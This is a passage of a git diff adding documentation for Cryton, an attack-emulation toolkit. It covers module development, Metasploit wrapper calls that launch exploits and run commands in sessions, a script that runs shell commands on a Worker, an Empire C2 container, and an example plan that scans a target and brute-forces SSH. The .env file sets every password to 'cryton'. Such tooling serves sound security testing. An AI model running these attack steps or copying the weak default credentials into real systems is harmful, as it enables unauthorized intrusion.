+ +```shell +tox -- tests/unit_tests/ --cov=cryton_core --cov-config=.coveragerc-unit +``` + +```shell +tox -- tests/integration_tests/ --cov=cryton_core --cov-config=.coveragerc-integration +``` + +## django setup for testing scripts + +``` +import os +os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cryton_core.settings") +import django +django.setup() +``` + +## Django migrations + +### Apply migrations +``` +cryton-core migrate +``` + +### Init migrations +Migrations in `cryton_core/cryton_app/migrations/` must be empty +``` +cryton-core makemigrations cryton_app +``` diff --git a/docs/development/frontend.md b/docs/development/frontend.md new file mode 100644 index 0000000000000000000000000000000000000000..259181bce8f141ed23a1b6f2475c5ada2b6b2ec5 --- /dev/null +++ b/docs/development/frontend.md @@ -0,0 +1,24 @@ +## Installation + +!!! danger "Requirements" + + - [npm](https://nodejs.org/en/){target="_blank"} + +Install dependencies: +```shell +npm install +``` + +## Usage +Start a development server: +```shell +npm start +``` + +The app will refresh itself when the project changes. + +!!! note "We use Husky to run pre-commit hooks" + + - Code formatting with Prettier. + - Linting with ESLint. + - Running unit tests with Karma. diff --git a/docs/development/modules.md b/docs/development/modules.md new file mode 100644 index 0000000000000000000000000000000000000000..0f81499532d3655eceb438147e59987055893dea --- /dev/null +++ b/docs/development/modules.md @@ -0,0 +1,239 @@ +Modules are hot-swappable, which means the modules don't have to be present at startup. +This is especially useful for development but **not recommended for production**. + +## Input parameters +Every module has its input parameters. These input parameters are given by the Worker as a dictionary to the +module `execute` (when executing the module) or `validate` (when validating the module parameters) function. 
+ +## Output parameters +Every attack module (its `execute` function) returns a dictionary to the Worker with the following keys: + +| Parameter name | Parameter meaning | +|---------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `return_code` | Numeric representation of result (0, -1, -2). <br />0 (OK) means the module finished successfully.<br />-1 (FAIL) means the module finished unsuccessfully.<br />-2 (ERROR) means the module finished with an unhandled error. | +| `serialized_output` | Parsed output of the module. Eg. for a brute force module, this might be a list of found usernames and passwords. | | +| `output` | Raw output of the module | + + +## How to create attack modules +In this section, we will discuss best practices and some rules that each module must follow. + +To be able to execute a module using the Worker, it must have the following structure and IO arguments. + +- Each module must have its directory with its name. +- The main module script must be called `mod.py`. +- Module must contain an `execute` function that takes a dictionary and returns a dictionary. It's an entry point for executing it. +- Module should contain a `validate` function that takes a dictionary, validates it, and returns 0 if it's okay, else raises an exception. + +Path example: +`/CRYTON_WORKER_MODULES_DIR/my-module-name/mod.py` + +Where: + +- **CRYTON_WORKER_MODULES_DIR** has to be the same path as is defined in the *CRYTON_WORKER_MODULES_DIR* variable. +- **my-module-name** is the directory containing your module. +- **mod.py** is the module file. 
+ +Here's an example of a typical module directory: +``` +my_module_name/ +├── mod.py +├── test_mod.py +├── README.md +├── requirements.txt +└── example.py +``` + +### mod.py +The most important file is the module itself (**must be called `mod.py`**). It consists of two main methods: +- `execute` (is used as an entry point for module execution; takes and returns **dictionary**) +- `validate` (is used to validate input parameters for the `execute` method; takes **dictionary** and returns 0 if it's okay, else raises an exception) + +You can also use [prebuilt functionality](#prebuilt-functionality) from Worker. + +Here's a simple example: +```python +def validate(arguments: dict) -> int: + if arguments != {}: + return 0 # If arguments are valid. + raise Exception("No arguments") # If arguments aren't valid. + +def execute(arguments: dict) -> dict: + # Do stuff. + return {"return_code": 0, "serialized_output": ["x", "y"]} + +``` + +And also a bit more complex example: +```python +from schema import Schema +from cryton_worker.lib.util.module_util import File + + +def validate(arguments: dict) -> int: + """ + Validate input arguments for the execute function. + :param arguments: Arguments for module execution + :raises: schema.SchemaError + :return: 0 If arguments are valid + """ + conf_schema = Schema({ + 'path': File(str), + }) + + conf_schema.validate(arguments) + return 0 + + +def execute(arguments: dict) -> dict: + """ + This attack module can read a local file. + Detailed information should be in README.md. 
+ :param arguments: Arguments for module execution + :return: Generally supported output parameters (for more information check Cryton Worker README.md) + """ + # Set default return values + ret_vals = { + "return_code": -1, + "serialized_output": {}, + "output": "" + } + + # Parse arguments + path_to_file = arguments.get("path") + + try: # Try to get the file's content + with open(path_to_file) as f: + my_file = f.read() + except IOError as ex: # In case of fatal error (expected) update output + ret_vals.update({'output': str(ex)}) + return ret_vals + + # In case of success update return_code to 0 (OK) and send the file content to the worker + ret_vals.update({"return_code": 0}) + ret_vals.update({'output': my_file}) + + return ret_vals + +``` + +### test_mod.py +Contains a set of tests to check if the code is correct. + +Here's a simple example: +```python +from mod import execute + + +class TestMyModuleName: + def test_mod_execute(self): + arguments = {'cmd': "test"} + + result = execute(arguments) + + assert result == {"return_code": 0} + +``` + +### README.md +README file should describe what the module is for, its IO parameters, and give the user some examples. + +It should also say what system requirements are necessary (with version). + +### requirements.txt +Here are the specified Python packages that are required to run the module. These requirements must be compliant with the +Python requirements in Cryton Worker. + +For example, if the module wants to use the `schema` package with version *2.0.0*, but the Worker requires version *2.1.1*, it won't work. + +### example.py +Is a set of predefined parameters that should allow the user to test if the module works as intended. 
+ +Example: + +```python +from mod import execute, validate + +args = { + "argument1": "value1", + "argument2": "value2" +} + +validate_output = validate(args) +print(f"validate output: {validate_output}") + +execute_output = execute(args) +print(f"execute output: {execute_output}") + + +``` + +## Prebuilt functionality +The worker provides prebuilt functionality to make building modules easier. Import it using: +```python +from cryton_worker.lib.util import module_util +``` + +It gives you access to: +### Metasploit +Wrapper for *MsfRpcClient* from *[pymetasploit3](https://github.com/DanMcInerney/pymetasploit3)*. +Examples: +```python +# Check if the connection to msfrpcd is OK before doing anything. +from cryton_worker.lib.util.module_util import Metasploit +msf = Metasploit() +if msf.is_connected(): + msf.do_stuff() +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +search_criteria = {"via_exploit": "my/exploit"} +found_sessions = Metasploit().get_sessions(**search_criteria) +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +output = Metasploit().execute_in_session("my_command", "session_id") +``` + +```python +from cryton_worker.lib.util.module_util import Metasploit + +options = {"exploit_arguments": {}, "payload_arguments": {}} +Metasploit().execute_exploit("my_exploit", "my_payload", **options) +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +token = Metasploit().client.add_perm_token() +``` +```python +from cryton_worker.lib.util.module_util import Metasploit +output = Metasploit().get_parameter_from_session("session_id", "my_param") +``` + +### get_file_binary +Function to get a file as binary. +Example: +```python +from cryton_worker.lib.util.module_util import get_file_binary +my_file_content = get_file_binary("/path/to/my/file") +``` + +### File +Class used with *[schema](https://pypi.org/project/schema/)* for validation if the file exists. 
+Example: +```python +from schema import Schema +from cryton_worker.lib.util.module_util import File +schema = Schema(File(str)) +schema.validate("/path/to/file") +``` + +### Dir +Class used with *[schema](https://pypi.org/project/schema/)* for validation if the directory exists. +Example: +```python +from schema import Schema +from cryton_worker.lib.util.module_util import Dir +schema = Schema(Dir(str)) +schema.validate("/path/to/directory") +``` diff --git a/docs/development/worker.md b/docs/development/worker.md new file mode 100644 index 0000000000000000000000000000000000000000..276c58f7f149507881a2f53c66908c64c8645607 --- /dev/null +++ b/docs/development/worker.md @@ -0,0 +1,68 @@ +## Settings +The best thing you can do is to change the app directory to `path/to/cryton-worker/`. That way, you can edit the default .env file +and use it for the compose files. +```shell +export CRYTON_WORKER_APP_DIRECTORY=path/to/cryton-worker/ +``` + +[Link to the settings](../components/worker.md#settings). + +## Installation + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [Poetry](https://python-poetry.org/docs/#installation){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-worker.git +``` + +Start the [prerequisites](../components/worker.md#prerequisites). + +Then go to the correct directory and install the project: +```shell +cd cryton-worker +poetry install +``` + +To spawn a shell use: +```shell +poetry shell +``` + +## Usage +```shell +cryton-worker start +``` + +[Link to the usage](../components/worker.md#usage). 
+ +## Testing + +### Pytest +``` +pytest --cov=cryton_worker tests/unit_tests --cov-config=.coveragerc-unit --cov-report html +``` + +???+ "Run specific test" + + ``` + my_test_file.py::MyTestClass::my_test + ``` + +### tox +Use in combination with [pyenv](https://github.com/pyenv/pyenv){target="_blank"}. + +```shell +tox -- tests/unit_tests/ --cov=cryton_worker --cov-config=.coveragerc-unit +``` + +## Bending the RabbitMQ API +It is possible to use Cryton Worker as a standalone application and control it using your requests. +It is also possible to create your Worker and use Core to control it. diff --git a/docs/dynamic-execution.md b/docs/dynamic-execution.md new file mode 100644 index 0000000000000000000000000000000000000000..a532d7a8a6b5c2b392bd07ee737ca38d04f3445f --- /dev/null +++ b/docs/dynamic-execution.md @@ -0,0 +1,144 @@ +To support dynamic security testing. We've added support for creating dynamic plans. They allow the user to +create an empty Plan/Stage and create their agent to control the execution instead of Cryton's advanced scheduler. 
+ +## Features +- Create a Plan/Step/Stage for dynamic execution (an empty list of Stages/Steps can be provided) +- Add Step to Stage execution and execute it +- Add Stage to Plan execution and start it +- Added Steps are automatically set as a successor of the last Step (only if the `is_init` variable is **not** set to *True* and a possible parent Step exists) + +## Limitations +- Dynamic plan must have a `dynamic` variable set to *True* +- If you don't want to pass any Stages/Steps you must provide an empty list +- Each Stage and Step must have a unique name in the same Plan (utilize [inventory variables](designing-phase/plan-instance.md#inventory-files) to overcome this limitation) +- The Stage/Step you're trying to add must be valid +- Run's Plan must contain the instance (Stage/Step) you are trying to execute +- You cannot create multiple executions for an instance (you can execute an instance only once) under the same Plan execution + +## Example using Python +You will probably want to automate these actions rather than using CLI to do them. For this purpose, we will create a simple Python script that will: + +1. Create a template +2. Create a Plan +3. Add a Stage +4. Add a Step +5. Create a Run +6. Execute the Run +7. Create a new Step +8. Execute the new Step +9. Get the Run report + +!!! danger "Requirements" + + - Cryton Core is running (REST API is accessible at *localhost:8000*) + - Worker is registered in Core and running + - mod_cmd is accessible from the Worker + +Download the example script: + +=== "curl" + + ```shell + curl -O {{{config.site_url}}}{{{ release_version }}}/dynamic_example.py + ``` + +=== "wget" + + ```shell + wget {{{config.site_url}}}{{{ release_version }}}/dynamic_example.py + ``` + +Update the `WORKER_ID` variable, and run the script: +```shell +python3 dynamic_example.py +``` + +??? abstract "Show the example" + + ```python + {! 
include "dynamic_example.py" !} + ``` + +## Example using CLI +For this example we will assume that: + +!!! danger "Requirements" + + - Cryton Core is running (REST API is accessible at *localhost:8000*) + - Worker is registered in Core and running + - mod_cmd is accessible from the Worker + +Files used in this guide can be found in the [Cryton Core repository](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/{{{ git_release }}}/examples/dynamic-execution-example){target="_blank"}. + +It's best to switch to the example directory, so we will assume that's true. +```shell +cd /path/to/cryton-core/examples/dynamic-execution-example/ +``` + +### Building a base Plan and executing it +First, we create a template +```shell +cryton-cli plan-templates create template.yml +``` + +Create a Plan (instance) +```shell +cryton-cli plans create <template_id> +``` + +Add a Stage to the Plan (update the inventory file to your needs) +```shell +cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml +``` + +Add an initial Step to the Stage +```shell +cryton-cli steps create <stage_id> step-init.yml +``` + +Add a reusable Step to the Stage (update the inventory file to your needs) +```shell +cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml +``` + +Create a Worker you want to test on +```shell +cryton-cli workers create local +``` + +Create a Run +```shell +cryton-cli runs create <plan_id> <worker_id> +``` + +Execute the Run +```shell +cryton-cli runs execute <run_id> +``` + +### Start a standalone Stage: +Add your Stage to the desired Plan (**Update the inventory file! Stage names must be unique.**) +```shell +cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml +``` + +Start your Stage (its trigger) under the desired Plan execution +```shell +cryton-cli stages start-trigger <stage_id> <plan_execution_id> +``` + +### Execute a standalone Step: +Add your Step to the desired Stage (**Update the inventory file! 
Step names must be unique.**) +```shell +cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml +``` + +Execute your Step under the desired Stage execution +```shell +cryton-cli steps execute <step_id> <stage_execution_id> +``` + +### Check the results - works only once the Run is created: +```shell +cryton-cli runs report 1 --less +``` diff --git a/docs/dynamic_example.py b/docs/dynamic_example.py new file mode 100644 index 0000000000000000000000000000000000000000..ebe1b078c8181db6fea037a7a27ce30be41e4c82 --- /dev/null +++ b/docs/dynamic_example.py @@ -0,0 +1,120 @@ +import requests +import yaml +import time + +WORKER_ID = 0 + +TEMPLATE = { + "plan": { + "name": "example", + "owner": "Cryton", + "dynamic": True, + "stages": [] + } +} + +STAGE = { + "name": "no delay stage {{ id }}", + "trigger_type": "delta", + "trigger_args": { + "seconds": 0 + }, + "steps": [] +} + +STEP = { + "name": "initial step", + "step_type": "worker/execute", + "is_init": True, + "arguments": { + "module": "mod_cmd", + "module_arguments": { + "cmd": "whoami" + } + } +} + +STEP_REUSABLE = { + "name": "reusable step {{ id }}", + "step_type": "worker/execute", + "arguments": { + "module": "mod_cmd", + "module_arguments": { + "cmd": "{{ command }}" + } + } +} + + +def get_api_root(): + api_address = "localhost" + api_port = 8000 + return f"http://{api_address}:{api_port}/api/" + + +if __name__ == "__main__": + # Check if the Worker is specified + if WORKER_ID < 1: + raise Exception("Please specify a correct Worker ID at the top of the file.") + print(f"Worker id: {WORKER_ID}") + + # Get api root + api_root = get_api_root() + + # 1. Create a template + r_create_template = requests.post(f"{api_root}templates/", files={"file": yaml.dump(TEMPLATE)}) + template_id = r_create_template.json()['id'] + print(f"Template id: {template_id}") + + # 2. 
Create a Plan + r_create_plan = requests.post(f"{api_root}plans/", data={'template_id': template_id}) + plan_id = r_create_plan.json()['id'] + print(f"Plan id: {plan_id}") + + # 3. Add a Stage + stage_inventory = {"id": 1} + r_create_stage = requests.post(f"{api_root}stages/", data={'plan_id': plan_id}, + files={"file": yaml.dump(STAGE), "inventory_file": yaml.dump(stage_inventory)}) + stage_id = r_create_stage.json()['id'] + print(f"Stage id: {stage_id}") + + # 4. Add a Step + r_create_step = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, files={"file": yaml.dump(STEP)}) + step_id = r_create_step.json()['id'] + print(f"Step id: {step_id}") + + # 5. Create a new Run + r_create_run = requests.post(f"{api_root}runs/", data={'plan_id': plan_id, "worker_ids": [WORKER_ID]}) + run_id = r_create_run.json()["id"] + print(f"Run id: {run_id}") + + # 6. Execute the Run + r_execute_run = requests.post(f"{api_root}runs/{run_id}/execute/", data={'run_id': run_id}) + print(f"Run response: {r_execute_run.text}") + + # 7. Create a new Step + step_inventory = {"id": 1, "command": "echo test"} + r_create_step2 = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, + files={"file": yaml.dump(STEP_REUSABLE), + "inventory_file": yaml.dump(step_inventory)}) + step_id2 = r_create_step2.json()['id'] + print(f"Second step id: {step_id2}") + + # 8. Execute the new Step (First, get Stage execution's id) + stage_execution_id = requests.get(f"{api_root}runs/{run_id}/report/")\ + .json()["detail"]["plan_executions"][0]["stage_executions"][0]["id"] + r_execute_step = requests.post(f"{api_root}steps/{step_id2}/execute/", + data={'stage_execution_id': stage_execution_id}) + print(f"Second Step response: {r_execute_step.text}") + + # 9. Get Run report + for i in range(5): + time.sleep(3) + current_state = requests.get(f"{api_root}runs/{run_id}/").json()["state"] + if current_state == "FINISHED": + break + print(f"Waiting for a final state. 
Current state: {current_state}") + + print() + print("Report: ") + print(yaml.dump(requests.get(f"{api_root}runs/{run_id}/report/").json()["detail"])) diff --git a/docs/2022.2/execution-phase/execution.md b/docs/execution-phase/execution.md similarity index 100% rename from docs/2022.2/execution-phase/execution.md rename to docs/execution-phase/execution.md diff --git a/docs/2022.2/execution-phase/reporting.md b/docs/execution-phase/reporting.md similarity index 100% rename from docs/2022.2/execution-phase/reporting.md rename to docs/execution-phase/reporting.md diff --git a/docs/2022.2/execution-phase/run.md b/docs/execution-phase/run.md similarity index 100% rename from docs/2022.2/execution-phase/run.md rename to docs/execution-phase/run.md diff --git a/docs/extra/variables.yml b/docs/extra/variables.yml new file mode 100644 index 0000000000000000000000000000000000000000..d547d53188239068be4aca1f5d1a7620c4f6f47e --- /dev/null +++ b/docs/extra/variables.yml @@ -0,0 +1,6 @@ +release_version: 2023.1 +git_release: stable/2023.1 + +python: + min: 3.8 + max: 3.12 \ No newline at end of file diff --git a/docs/getting-started/.env b/docs/getting-started/.env new file mode 100644 index 0000000000000000000000000000000000000000..f263281dfbafb255fa2f48370361698a0a6dd942 --- /dev/null +++ b/docs/getting-started/.env @@ -0,0 +1,27 @@ +CRYTON_CORE_RABBIT_HOST=cryton-rabbit +CRYTON_CORE_RABBIT_PORT=5672 +CRYTON_CORE_RABBIT_USERNAME=cryton +CRYTON_CORE_RABBIT_PASSWORD=cryton +CRYTON_CORE_DB_HOST=cryton-pgbouncer +CRYTON_CORE_DB_PORT=5432 +CRYTON_CORE_DB_NAME=cryton +CRYTON_CORE_DB_USERNAME=cryton +CRYTON_CORE_DB_PASSWORD=cryton +CRYTON_CORE_API_SECRET_KEY=cryton +CRYTON_CORE_API_USE_STATIC_FILES=true + +CRYTON_WORKER_NAME=local_worker +CRYTON_WORKER_MODULES_DIR=/opt/modules/ +CRYTON_WORKER_MSFRPCD_HOST=127.0.0.1 +CRYTON_WORKER_MSFRPCD_PORT=55553 +CRYTON_WORKER_MSFRPCD_SSL=true +CRYTON_WORKER_MSFRPCD_USERNAME=cryton +CRYTON_WORKER_MSFRPCD_PASSWORD=cryton 
+CRYTON_WORKER_RABBIT_HOST=cryton-rabbit +CRYTON_WORKER_RABBIT_USERNAME=cryton +CRYTON_WORKER_RABBIT_PASSWORD=cryton +CRYTON_WORKER_EMPIRE_HOST=cryton-empire +CRYTON_WORKER_EMPIRE_USERNAME=cryton +CRYTON_WORKER_EMPIRE_PASSWORD=cryton + +CRYTON_CLI_API_PORT=80 diff --git a/docs/2022.2/starting-point/ansible.md b/docs/getting-started/ansible.md similarity index 96% rename from docs/2022.2/starting-point/ansible.md rename to docs/getting-started/ansible.md index 424ec0f88da5430880d1c8cc3f98334bca9604e2..fec343cdad1de5f977198f5c348d6781afaf4f2c 100644 --- a/docs/2022.2/starting-point/ansible.md +++ b/docs/getting-started/ansible.md @@ -19,7 +19,7 @@ and select the latest version (**the master branch is not stable**). Install prerequisites, dependencies (RabbitMQ, Postgres, and PgBouncer), and Core using Docker Compose. Core's REST API is by default served on port 8000. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/core/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/core/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: deploy-core @@ -48,7 +48,7 @@ Set `cryton_cli_runas_user` to the correct user for whom will the Worker be inst Optionally, Worker can be installed in a mode fitting for development purposes. To enable this mode, set ``development: True`` variable for Ansible. This will install and run the Worker using poetry. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/worker/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/worker/#settings){target="_blank"}. 
In the Ansible playbook use the following: ```yaml - role: deploy-worker @@ -66,7 +66,7 @@ Install prerequisites, dependencies, and CLI in `~/.local/bin/cryton-cli` using Set `cryton_cli_runas_user` to the correct user for whom will the Worker be installed. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: deploy-cli @@ -82,7 +82,7 @@ Register Worker in Core using CLI. Specify `cryton_worker_name`, `cryton_worker_description`, and `cryton_cli_runas_user` to the correct user with access to the CLI. -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/cli/#settings){target="_blank"}. In the Ansible playbook use the following: ```yaml - role: register-worker @@ -98,7 +98,7 @@ Install prerequisites and frontend for Cryton Core API using Docker Compose. The **!This role requires the host to have at least 2048 MB RAM and 2 CPU cores (tested with AMD Ryzen 5 5600x) otherwise the Frontend installation might fail.!** -Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/frontend/#settings). +Override environment variables as specified in the [settings](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/2022.2/starting-point/frontend/#settings){target="_blank"}. 
In the Ansible playbook use the following: ```yaml - role: deploy-frontend diff --git a/docs/getting-started/docker-compose.yml b/docs/getting-started/docker-compose.yml new file mode 100644 index 0000000000000000000000000000000000000000..062e170f5b3408f75a6f50d9580cc1c719e45500 --- /dev/null +++ b/docs/getting-started/docker-compose.yml @@ -0,0 +1,131 @@ +version: '3.9' +services: + cryton_core: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-core:{{{ release_version }}} + container_name: cryton-core + ports: + - "8000:80" + env_file: + - .env + depends_on: + cryton_pgbouncer: + condition: service_healthy + cryton_rabbit: + condition: service_healthy + + cryton_proxy: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-core:proxy-{{{ release_version }}} + container_name: cryton-proxy + network_mode: service:cryton_core + depends_on: + cryton_core: + condition: service_started + + cryton_cli: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-cli:{{{ release_version }}} + container_name: cryton-cli + network_mode: service:cryton_core + env_file: + - .env + depends_on: + cryton_core: + condition: service_started + tty: true + + cryton_worker: + restart: always + image: registry.gitlab.ics.muni.cz:443/cryton/cryton-worker:kali-{{{ release_version }}} + container_name: cryton-worker + network_mode: host + env_file: + - .env + volumes: + - ./cryton-modules/modules/:${CRYTON_WORKER_MODULES_DIR} + - cryton_worker_db_data:/var/lib/postgresql/15/main + + cryton_empire: + restart: always + image: bcsecurity/empire:v4.10.0 + container_name: cryton-empire + expose: + - "1337" + env_file: + - .env + stdin_open: true + command: [ "server", "--username", "$CRYTON_WORKER_EMPIRE_USERNAME", "--password", "$CRYTON_WORKER_EMPIRE_PASSWORD" ] + + cryton_db: + restart: always + image: postgres:13 + container_name: cryton-db + env_file: + - .env + environment: + POSTGRES_PASSWORD: $CRYTON_CORE_DB_PASSWORD + 
POSTGRES_USER: $CRYTON_CORE_DB_USERNAME + POSTGRES_DB: $CRYTON_CORE_DB_NAME + volumes: + - cryton_core_db_data:/var/lib/postgresql/data + expose: + - "5432" + healthcheck: + test: /usr/bin/pg_isready + interval: 20s + timeout: 10s + retries: 5 + + cryton_pgbouncer: + restart: always + image: edoburu/pgbouncer:1.18.0 + container_name: cryton-pgbouncer + depends_on: + cryton_db: + condition: service_healthy + env_file: + - .env + environment: + DB_HOST: cryton_db + DB_USER: $CRYTON_CORE_DB_USERNAME + DB_NAME: $CRYTON_CORE_DB_NAME + DB_PASSWORD: $CRYTON_CORE_DB_PASSWORD + MAX_CLIENT_CONN: 5000 + DEFAULT_POOL_SIZE: 8 + MIN_POOL_SIZE: 8 + POOL_MODE: transaction + expose: + - "5432" + healthcheck: + test: /usr/bin/pg_isready -h 0.0.0.0 -p 5432 + interval: 20s + timeout: 10s + retries: 5 + + cryton_rabbit: + restart: always + image: rabbitmq:3.11-management + container_name: cryton-rabbit + env_file: + - .env + environment: + RABBITMQ_DEFAULT_USER: $CRYTON_CORE_RABBIT_USERNAME + RABBITMQ_DEFAULT_PASS: $CRYTON_CORE_RABBIT_PASSWORD + ports: + - "5672:5672" + - "127.0.0.1:15672:15672" + healthcheck: + test: rabbitmqctl eval ' + { true, rabbit_app_booted_and_running } = { rabbit:is_booted(node()), rabbit_app_booted_and_running }, + { [], no_alarms } = { rabbit:alarms(), no_alarms }, + [] /= rabbit_networking:active_listeners(), + rabbitmq_node_is_healthy. + ' || exit 1 + interval: 20s + timeout: 10s + retries: 5 + +volumes: + cryton_core_db_data: + cryton_worker_db_data: diff --git a/docs/getting-started/execution-example.md b/docs/getting-started/execution-example.md new file mode 100644 index 0000000000000000000000000000000000000000..e122c910a7bd70b47a49950bfd151b1cea1f0237 --- /dev/null +++ b/docs/getting-started/execution-example.md @@ -0,0 +1,264 @@ +Now, we will walk through an example execution. We will follow the workflow specified in the [previous guide](workflow.md). + +!!! 
warning "Prerequisites" + + It is assumed that you've followed the [quick-start](quick-start.md) guide. If that's not the case, make sure the following requirements are met: + + - [Core](../components/core.md) is up and running + - Core's [prerequisites](../components/core.md#prerequisites) are up and running + - [CLI](../components/cli.md) is installed + - [Worker](../components/worker.md) is installed, running, and correctly set up to use the [modules](../components/modules.md) + - Worker's [prerequisites](../components/worker.md#prerequisites) are up and running + - [Modules](../components/modules.md#installation)' system requirements are satisfied + - If CLI and Core are not on the same machine, make sure to update [CLI's settings](../components/cli.md#crytoncliapihost) + +## Create a plan template +To execute our attack plan, we must create its [template](../designing-phase/template.md) first – a description +of the actions required to run during attack execution based on tools used during the attack. + +We will be using a basic example, which can be found +[here](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/{{{ git_release }}}/examples){target="_blank"} as well as other examples. + +Download it [manually](https://gitlab.ics.muni.cz/cryton/cryton-core/-/blob/{{{ git_release }}}/examples/basic-example/template.yml){target="_blank"} or using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/template.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/template.yml + ``` + +It describes a 2 step attack plan. First, it scans the target and checks if port 22 is open. If the port is open, it tries to brute force the credentials. 
+ +```mermaid +graph LR + A[Start] --> B[Scan target]; + B --> C{Is port 22 open?}; + C -->|No| E[Finish]; + C -->|Yes| D[Bruteforce credentials]; + D --> E; +``` + +--- + +If we are satisfied with our template, we can upload it using CLI: +```shell +cryton-cli plan-templates create path/to/template.yml +``` + +??? example "Example" + + ```shell + cryton-cli plan-templates create template.yml + ``` + + Expected output: + ``` + Template successfully created! ({'id': 1}) + ``` + +??? tip "Validate the template first" + + Before we upload the template, we should validate it. However, for our template to be validated correctly, + we have to provide an inventory file, which is described [here](#create-a-plan-instance). Once we have it, we can simply run: + ```shell + cryton-cli plans validate template.yml -i inventory.yml + ``` + + ??? example "Example" + + ```shell + cryton-cli plans validate template.yml -i inventory.yml + ``` + + Expected output: + ``` + Plan successfully validated! (<response>) + ``` + + Don't forget to upload the template afterward. + +## Register the Worker +To be able to use our Worker, we have to register it. Keep in mind that **WORKER_NAME** must match the Worker’s `CRYTON_WORKER_NAME` setting: +```shell +cryton-cli workers create <WORKER_NAME> -d <WORKER_DESCRIPTION> +``` + +??? example "Example" + + ```shell + cryton-cli workers create local_worker -d "my worker on localhost" + ``` + + Expected output: + ``` + Worker successfully created! ({'id': 1}) + ``` + +To check if the Worker is running, use the health check: +```shell +cryton-cli workers health-check <WORKER_ID> +``` + +??? example "Example" + + ```shell + cryton-cli workers health-check 1 + ``` + + Expected output: + ``` + The Worker successfully checked! (<response>) + ``` + +## Create a Plan instance +Now we need to create a Plan instance we will use for the execution. 
Create it using a combination of +the previously uploaded template and an [inventory file](../designing-phase/plan-instance.md#inventory-files). + +Download the inventory file [manually](https://gitlab.ics.muni.cz/cryton/cryton-core/-/blob/{{{ git_release }}}/examples/basic-example/inventory.yml){target="_blank"} or using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/inventory.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/{{{ git_release }}}/examples/basic-example/inventory.yml + ``` + +It determines the missing variables in the template. More precisely, it states the target and the credentials used for the brute force attack. + +To create a new Plan instance use: +```shell +cryton-cli plans create <TEMPLATE_ID> -i path/to/my/inventory.yml +``` + +??? example "Example" + + ```shell + cryton-cli plans create 1 -i inventory.yml + ``` + + Expected output: + ``` + Plan Instance successfully created! ({'id': 1}) + ``` + +## Create a Run +The last step we have to make is to create a new [Run](../execution-phase/run.md) from the previously created Plan instance +and Worker(s). To do so, use: +```shell +cryton-cli runs create <PLAN_INSTANCE_ID> <WORKER_ID1> <WORKER_ID2> <WORKER_ID3> ... +``` + +??? example "Example" + + ```shell + cryton-cli runs create 1 1 2 3 + ``` + + Expected output: + ``` + Run successfully created! ({'id': 1}) + ``` + +## Execute the Run + +!!! warning "It works.. but at what cost?" + + Please, make sure that you are allowed to run the scan and brute force (there **shouldn't** be any problems doing so on **localhost**). + Otherwise, there may be consequences. + +Now that everything is prepared, we can execute our Run immediately or schedule it for later. + +=== "immediately" + + To execute the Run immediately use: + + ```shell + cryton-cli runs execute <RUN_ID> + ``` + + ??? 
